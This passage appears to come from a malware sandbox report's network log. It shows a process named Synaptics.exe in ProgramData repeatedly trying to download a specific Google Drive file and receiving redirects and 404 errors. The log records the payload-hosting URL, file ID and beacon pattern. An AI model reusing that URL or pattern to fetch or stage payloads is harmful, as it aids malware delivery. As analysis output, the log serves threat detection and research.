                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                                                                                                                                                      2024-12-30 10:25:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RezMztyOWMBScXD2wLZD9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      37192.168.2.1149904142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5jux0iU5fNHlHmzifbPL-V3MsFSwXvcCatqIIP1v1f9Ut_eFAs14giCVRqWGmXh_2R
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-5GwATmorsfyUrXLyXgICJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4e 35 6a 41 45 6b 39 5f 32 53 38 6f 42 47 5a 41 6d 74 43 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="jN5jAEk9_2S8oBGZAmtClQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      38192.168.2.1149912172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                                                                                                                                                      2024-12-30 10:25:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_oSdaHcGhrPLQB8j9Q8VkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      39192.168.2.1149913172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                                                                                                                                                      2024-12-30 10:25:42 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YdFcRz7PcTvjerU0KbUGtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      40192.168.2.1149914142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:41 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:42 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6LEldmyVtq1I0dZB6tvLPuK6yC_Y7ZD6XTgWdx3gT3KiFE6rbV2PQqfb3oV-IIzA5e6LP8p28
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-IslGZ1Sr9Ws93cxFlpmqRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:42 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:42 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 45 77 4d 70 33 4d 6e 71 71 4a 76 65 56 74 72 52 54 7a 34 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="cEwMp3MnqqJveVtrRTz4Sw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:42 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      41192.168.2.1149920142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6aJCs7LypraYTT4-ESRkuEpyqMixg-7eCxiNTRF9Kj6A46X3l6CTAlcmVd5p9rhguK
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-t5zpjG22om98qdy5ZMnG0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:42 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 6b 61 31 61 46 5f 35 66 59 71 30 63 47 4e 4a 37 6c 57 6a 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="dka1aF_5fYq0cGNJ7lWjJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:42 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      42192.168.2.1149922172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LqRVkbVtOHf17a6HvsqfoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      43192.168.2.1149921172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
